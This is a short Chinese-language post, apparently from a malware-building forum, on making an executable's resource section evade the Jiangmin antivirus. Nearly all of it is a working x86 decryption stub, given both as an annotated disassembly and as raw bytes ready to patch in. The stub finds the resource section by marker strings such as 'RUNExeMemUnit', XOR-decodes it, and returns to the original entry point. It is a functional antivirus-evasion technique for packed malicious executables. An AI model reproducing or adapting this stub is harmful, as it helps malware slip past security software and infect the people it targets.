资源段自动加密江民针对资源段查杀比较严格,需要对资源段做特殊处理。关键字004C55E15C52554E4578654D656D556E69740054/RUNExeMemUnit.T004C55F1
.
资源段自动加密
江民针对资源段查杀比较严格,需要对资源段做特殊处理。 
关键字
004C55E1 5C 52 55 4E 45 78 65 4D 65 6D 55 6E 69 74 00 54 /RUNExeMemUnit.T
004C55F1 50 46 30 0D 54 4D 61 69 6E 46 6F 72 6D 56 65 72 PF0.TMainFormVer2
004A2238 > 55 push ebp
004A2239 89E5 mov ebp, esp
004A223B 51 push ecx
004A223C B9 08000000 mov ecx, 0x8
004A2241 6A 00 push 0x0
004A2243 49 dec ecx
004A2244 ^ 75 FB jnz short 004A2241
004A2246 8B4C24 20 mov ecx, dword ptr [esp+0x20]
004A224A 8944E4 1C mov dword ptr [esp+0x1C], eax
004A224E 895CE4 18 mov dword ptr [esp+0x18], ebx
004A2252 894CE4 14 mov dword ptr [esp+0x14], ecx
004A2256 8954E4 10 mov dword ptr [esp+0x10], edx
004A225A 8964E4 0C mov dword ptr [esp+0xC], esp
004A225E 896CE4 08 mov dword ptr [esp+0x8], ebp
004A2262 8974E4 04 mov dword ptr [esp+0x4], esi
004A2266 893CE4 mov dword ptr [esp], edi
004A2269 90 nop
004A226A 90 nop
004A226B 90 nop
004A226C 90 nop
004A226D 90 nop
004A226E E8 00000000 call 004A2273
004A2273 58 pop eax
004A2274 25 00F0FFFF and eax, -0x1000
004A2279 66:8138 4D5A cmp word ptr [eax], 0x5A4D
004A227E 74 07 je short 004A2287
004A2280 2D 00100000 sub eax, 0x1000
004A2285 ^ EB F2 jmp short 004A2279
004A2287 50 push eax ; push
004A2288 8BD8 mov ebx, eax
004A228A 83C3 3C add ebx, 0x3C
004A228D 8B1B mov ebx, dword ptr [ebx]
004A228F 03D8 add ebx, eax ; pe address
004A2291 8BD3 mov edx, ebx ; ebx edx
004A2293 33C9 xor ecx, ecx
004A2295 66:8B4B 06 mov cx, word ptr [ebx+0x6] ; cx num
004A2299 33C0 xor eax, eax
004A229B 66:8B43 14 mov ax, word ptr [ebx+0x14] ; pe daxiao
004A229F 83C3 18 add ebx, 0x18
004A22A2 03D8 add ebx, eax ; qu duan
004A22A4 90 nop
004A22A5 49 dec ecx ; 28
004A22A6 83C3 28 add ebx, 0x28
004A22A9 49 dec ecx
004A22AA ^ 75 FA jnz short 004A22A6
004A22AC 90 nop
004A22AD 83C3 0C add ebx, 0xC ; rva
004A22B0 8B1B mov ebx, dword ptr [ebx] ; rva
004A22B2 031C24 add ebx, dword ptr [esp] ; zi yuan duan address
004A22B5 53 push ebx ; push
004A22B6 90 nop
004A22B7 90 nop
004A22B8 90 nop
004A22B9 90 nop
004A22BA 90 nop
004A22BB 90 nop
004A22BC 90 nop ; next search
004A22BD 803B 5C cmp byte ptr [ebx], 0x5C
004A22C0 74 03 je short 004A22C5
004A22C2 43 inc ebx
004A22C3 ^ EB F8 jmp short 004A22BD
004A22C5 807B 01 52 cmp byte ptr [ebx+0x1], 0x52
004A22C9 74 03 je short 004A22CE
004A22CB 43 inc ebx
004A22CC ^ EB EF jmp short 004A22BD
004A22CE 807B 02 55 cmp byte ptr [ebx+0x2], 0x55
004A22D2 74 03 je short 004A22D7
004A22D4 43 inc ebx
004A22D5 ^ EB E6 jmp short 004A22BD
004A22D7 807B 03 4E cmp byte ptr [ebx+0x3], 0x4E
004A22DB 74 03 je short 004A22E0
004A22DD 43 inc ebx
004A22DE ^ EB DD jmp short 004A22BD
004A22E0 807B 04 45 cmp byte ptr [ebx+0x4], 0x45
004A22E4 74 03 je short 004A22E9
004A22E6 43 inc ebx
004A22E7 ^ EB D4 jmp short 004A22BD
004A22E9 90 nop ; zhe ebx
004A22EA 83EB 05 sub ebx, 0x5
004A22ED B9 10060000 mov ecx, 0x610
004A22F2 8033 A7 xor byte ptr [ebx], 0xA7
004A22F5 4B dec ebx
004A22F6 49 dec ecx
004A22F7 ^ 75 F9 jnz short 004A22F2 ; 加密盲搜索之后的资源数据
004A22F9 90 nop
004A22FA 90 nop
004A22FB 90 nop
004A22FC 90 nop
004A22FD 90 nop
004A22FE 803B 54 cmp byte ptr [ebx], 0x54
004A2301 74 03 je short 004A2306
004A2303 43 inc ebx
004A2304 ^ EB F8 jmp short 004A22FE
004A2306 807B 01 50 cmp byte ptr [ebx+0x1], 0x50
004A230A 74 03 je short 004A230F
004A230C 43 inc ebx
004A230D ^ EB EF jmp short 004A22FE
004A230F 807B 02 46 cmp byte ptr [ebx+0x2], 0x46
004A2313 74 03 je short 004A2318
004A2315 43 inc ebx
004A2316 ^ EB E6 jmp short 004A22FE
004A2318 807B 03 30 cmp byte ptr [ebx+0x3], 0x30
004A231C 74 03 je short 004A2321
004A231E 43 inc ebx
004A231F ^ EB DD jmp short 004A22FE
004A2321 807B 04 0D cmp byte ptr [ebx+0x4], 0xD
004A2325 74 03 je short 004A232A
004A2327 43 inc ebx
004A2328 ^ EB D4 jmp short 004A22FE
004A232A 807B 05 54 cmp byte ptr [ebx+0x5], 0x54
004A232E 74 03 je short 004A2333
004A2330 43 inc ebx
004A2331 ^ EB CB jmp short 004A22FE
004A2333 90 nop
004A2334 90 nop
004A2335 83C3 13 add ebx, 0x13 ; start
004A2338 B9 B0020000 mov ecx, 0x2B0
004A233D 8033 9A xor byte ptr [ebx], 0x9A
004A2340 43 inc ebx
004A2341 49 dec ecx
004A2342 ^ 75 F9 jnz short 004A233D
004A2344 90 nop
004A2345 58 pop eax
004A2346 58 pop eax
004A2347 90 nop
004A2348 8B44E4 1C mov eax, dword ptr [esp+0x1C]
004A234C 8B5CE4 18 mov ebx, dword ptr [esp+0x18]
004A2350 8B4CE4 14 mov ecx, dword ptr [esp+0x14]
004A2354 8B54E4 10 mov edx, dword ptr [esp+0x10]
004A2358 8B64E4 0C mov esp, dword ptr [esp+0xC]
004A235C 8B6CE4 08 mov ebp, dword ptr [esp+0x8]
004A2360 8B74E4 04 mov esi, dword ptr [esp+0x4]
004A2364 8B3CE4 mov edi, dword ptr [esp]
004A2367 B9 00020000 mov ecx, 0x200
004A236C C1E1 06 shl ecx, 0x6
004A236F C1E9 0C shr ecx, 0xC
004A2372 83EC FC sub esp, -0x4
004A2375 49 dec ecx
004A2376 ^ 75 FA jnz short 004A2372
004A2378 8B6C24 04 mov ebp, dword ptr [esp+0x4]
004A237C B9 00020000 mov ecx, 0x200
004A2381 C1E1 06 shl ecx, 0x6
004A2384 C1E9 0C shr ecx, 0xC
004A2387 44 inc esp
004A2388 49 dec ecx
004A2389 ^ 75 FC jnz short 004A2387
004A238B 8B4C24 F8 mov ecx, dword ptr [esp-0x8]
004A238F E8 00000000 call 004A2394
004A2394 812C24 4C050000 sub dword ptr [esp], 0x54C 0x54C是新入口点和原来入口点的距离
004A239B C3 retn
==============
二进制:55 89 E5 51 B9 08 00 00 00 6A 00 49 75 FB 8B 4C 24 20 89 44 E4 1C 89 5C E4 18 89 4C E4 14 89 54 E4 10 89 64 E4 0C 89 6C E4 08 89 74 E4 04 89 3C E4 90 90 90 90 90 E8 00 00 00 00 58 25 00 F0 FF FF 66 81 38 4D 5A 74 07 2D 00 10 00 00 EB F2 50 8B D8 83 C3 3C 8B 1B 03 D8 8B D3 33 C9 66 8B 4B 06 33 C0 66 8B 43 14 83 C3 18 03 D8 90 49 83 C3 28 49 75 FA 90 83 C3 0C 8B 1B 03 1C 24 53 90 90 90 90 90 90 90 80 3B 5C 74 03 43 EB F8 80 7B 01 52 74 03 43 EB EF 80 7B 02 55 74 03 43 EB E6 80 7B 03 4E 74 03 43 EB DD 80 7B 04 45 74 03 43 EB D4 90 83 EB 05 B9 10 06 00 00 80 33 A7 4B 49 75
F9 90 90 90 90 90 80 3B 54 74 03 43 EB F8 80 7B 01 50 74 03 43 EB EF 80 7B 02 46 74 03 43 EB E6 80 7B 03 30 74 03 43 EB DD 80 7B 04 0D 74 03 43 EB D4 80 7B 05 54 74 03 43 EB CB 90 90 83 C3 13 B9 B0 02 00 00 80 33 9A 43 49 75 F9 90 58 58 90 8B 44 E4 1C 8B 5C E4 18 8B 4C E4 14 8B 54 E4 10 8B 64 E4 0C 8B 6C E4 08 8B 74 E4 04 8B 3C E4 B9 00 02 00 00 C1 E1 06 C1 E9 0C 83 EC FC 49 75 FA 8B 6C 24 04 B9 00 02 00 00 C1 E1 06 C1 E9 0C 44 49 75 FC 8B 4C 24 F8 E8 00 00 00 00 81 2C 24 4C 05 00 00 C3
.
